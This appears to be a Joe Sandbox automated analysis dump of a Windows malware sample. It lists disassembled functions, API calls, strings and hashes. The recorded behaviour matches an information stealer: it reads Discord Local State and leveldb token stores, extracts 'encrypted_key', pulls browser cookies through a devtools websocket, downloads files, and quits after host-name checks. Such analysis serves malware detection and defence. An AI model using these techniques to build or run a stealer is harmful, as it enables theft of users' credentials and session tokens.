                                                                                                                                                                                                                                                                                • Instruction ID: af6f1e03352f6f9f1d8fae1c75086c49a28638e44c42a35a98b4b473fe3f47e4
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1E1AF70204308AFD324AF25D895FABB3A9BB44344F04445EFD179B292DB7CE985CB69
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,?,?,00000000,?,?,00000000,?,?,00000000,00000000), ref: 00413081
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%DESKTOP%,00000000,?,00000010,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130AE
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%APPDATA%,00000000,?,0000001A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130DA
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%LOCALAPPDATA%,00000000,?,0000001C,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413106
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%USERPROFILE%,00000000,?,00000028,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413132
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%DOCUMENTS%,00000000,?,00000005,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041315E
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES%,00000000,?,00000026,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041318A
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES_86%,00000000,?,0000002A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131B6
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%RECENT%,00000000,?,00000008,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131E2
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,true,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00413268
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,false,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041327D
                                                                                                                                                                                                                                                                                • strtok_s.MSVCRT ref: 0041301C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$strtok_s$FolderPathlstrlen
                                                                                                                                                                                                                                                                                • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                • API String ID: 1330363096-2422389115
                                                                                                                                                                                                                                                                                • Opcode ID: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                • Instruction ID: f18559b84add82ea06590c7feb2660792e730a2b0798f24fd2155c98f040b140
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91C1AF70604308AFD214AF25DC95FABB3A9BB44348F00445EFD179B292DB7CA985CB69
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??2@??3@memcpy
                                                                                                                                                                                                                                                                                • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                • API String ID: 1695611338-4155744131
                                                                                                                                                                                                                                                                                • Opcode ID: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                • Instruction ID: b745cebb343ebaf7917439795664f4dc5ec349037e75ec0584470be98ece6274
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08D105B1A002145BDB24DF64DD84AAFB775EF41308F11052EF903A72C2DB7CAD958B99
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                                                • String ID: block$|
                                                                                                                                                                                                                                                                                • API String ID: 3407564107-542838162
                                                                                                                                                                                                                                                                                • Opcode ID: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                • Instruction ID: ce61686c9be415db56d3220093c378b95acedfbe19f9b6f22c8a3ac929646854
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03516FB0308708AFD7209F26D849B9BB7A9FB1174AF10440BEC1397290DB7DD6C58A5D
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00010000,?,0041DE17,?), ref: 0041D0C8
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00420BC0), ref: 0041D0FD
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.zip), ref: 0041D10F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.zoo), ref: 0041D11F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.arc), ref: 0041D12F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.lzh), ref: 0041D13F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.arj), ref: 0041D14F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.gz), ref: 0041D15F
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,.tgz), ref: 0041D16F
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                                                                                                                • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                                                                                                • API String ID: 1659193697-51310709
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004010A8
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004010BA
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C52), ref: 004010CE
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420F55), ref: 004010D6
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C48), ref: 004010DE
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420FB1), ref: 004010E6
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C18), ref: 004010EE
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C52), ref: 004010F6
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C50), ref: 004010FE
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0042035D,?,00420C50), ref: 00401106
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0042060F,?,0042035D,?,00420C50), ref: 0040110E
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401116
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040111E
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401126
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040112E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                • strcmp.MSVCRT ref: 00401137
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                • strcmp.MSVCRT ref: 0040114A
                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00401162
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcat$Heap$Process$AllocNamememsetstrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2002865342-0
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004153BA
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004153D0
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415403
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\discord\), ref: 00415415
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00415423
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,Local State), ref: 0041542F
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 004078F0: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                  • Part of subcall function 004078F0: lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                  • Part of subcall function 004078F0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411C00: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041552D,?,?,?), ref: 00411C0B
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,dQw4w9WgXcQ,?,?,?), ref: 00415535
                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0041568B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00407790: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0040402F,00000000,?,?,?,?,?,?,?), ref: 0040779E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00407790: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?), ref: 004077CF
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0042150A), ref: 00415659
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,-0000000C), ref: 0041566B
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00421509), ref: 00415679
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcat$AllocFileLocal$FreeGloballstrcpylstrlenmemset$AttributesCloseCreateFolderHandlePathReadSize
                                                                                                                                                                                                                                                                                • String ID: Local State$\discord\$dQw4w9WgXcQ
                                                                                                                                                                                                                                                                                • API String ID: 3817223191-2067953968
                                                                                                                                                                                                                                                                                • Opcode ID: 6f24543061e9ffb537914b6143e98d0867b4802166f338fab7a1659ffba852b0
                                                                                                                                                                                                                                                                                • Instruction ID: 194099574810176e2e4ab308ae0ea84b9e6f71d167dd19124bd853461179d086
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f24543061e9ffb537914b6143e98d0867b4802166f338fab7a1659ffba852b0
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EA17F71D007099BDB10EFB5CC85AEEB7B8FF48304F00455AF905A7152EB78AA85CBA5
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1A1
                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1E5
                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041D200
                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041D21B
                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041D224
                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D235
                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041D254
                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D265
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D2E6
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D305
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D321
                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D346
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$Time$HandleInformationSizeSystem
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3339682767-0
                                                                                                                                                                                                                                                                                • Opcode ID: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                • Instruction ID: 7dc5ab211660f74088cffd7409125a6117dcca4ff2d4ad636a370f5fe0998741
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1051F1B1604705AFE3208F15CC91B6BB7E8FB84744F10492DF595AB290D778E881CB59
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\discord\,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415C48
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415C68
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00415C7F
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00415C8D
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\Local Storage\leveldb\CURRENT), ref: 00415C99
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00415CA3
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\Local Storage\leveldb), ref: 00415CAF
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcat$FileHeaplstrcpystrlen$AllocAttributesFindFirstFolderPathProcessmemcmpwsprintf
                                                                                                                                                                                                                                                                                • String ID: \Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                • API String ID: 1512132791-1179288657
                                                                                                                                                                                                                                                                                • Opcode ID: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                • Instruction ID: db52eabd1130b4015811ae594007c4c182e7f7f0e4775522e0b09ec713fe86e8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D41A471900619ABC710EB719C86DEEB36CBF88348F40454AF64666052DB7CF6C58BA9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
Yara matches
Similarity
• API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
• String ID: https
• API String ID: 2507841554-1056335270
• Opcode ID: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
• Instruction ID: e26aa42ddcce7a9dc6db16cb5d707b66fd772de428dd0f6f7d264c55934dbf87
• Opcode Fuzzy Hash: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
• Instruction Fuzzy Hash: 9041E9719002199BDB10EFB0DD85BEE77B9EF84348F004029F901A7191DB78A98AC7E9
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
• GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
• ReleaseDC.USER32(00000000,00000000), ref: 004110D4
• GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
• HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
• wsprintfA.USER32 ref: 004110FA
  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
Yara matches
Similarity
• API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
• String ID: %dx%d$DISPLAY
• API String ID: 3940144428-3048177138
• Opcode ID: d4f6bdf6a8727250401686cbb5283f498457eeb982ee794fddf6dc554df9ea02
• Instruction ID: 594384e9460ea50e1c1a2799b2b5ef6833a83c8cc8fe28b05d57f5c36ffcb85d
• Opcode Fuzzy Hash: d4f6bdf6a8727250401686cbb5283f498457eeb982ee794fddf6dc554df9ea02
• Instruction Fuzzy Hash: 05F090713807047FF31027A5AC4EF2B7A5DEB84B56F110026BF06D72D2DAA56C1086F8
APIs
  • Part of subcall function 00404EA0: InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
  • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
  • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
• ??3@YAXPAX@Z.MSVCRT(?,?,00002407), ref: 00406F38
  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
  • Part of subcall function 004053F0: strlen.MSVCRT ref: 00405409
  • Part of subcall function 004053F0: memchr.MSVCRT ref: 00405456
  • Part of subcall function 004053F0: memcmp.MSVCRT(00000000,?,00000000), ref: 0040546E
  • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,77735E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
• memset.MSVCRT ref: 00406C44
• lstrcatA.KERNEL32(00000009,ws://localhost:9223,00000009,?,00002407), ref: 00406C58
• lstrcatA.KERNEL32(00000009,00000000), ref: 00406C65
Strings
Memory Dump Source
• Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
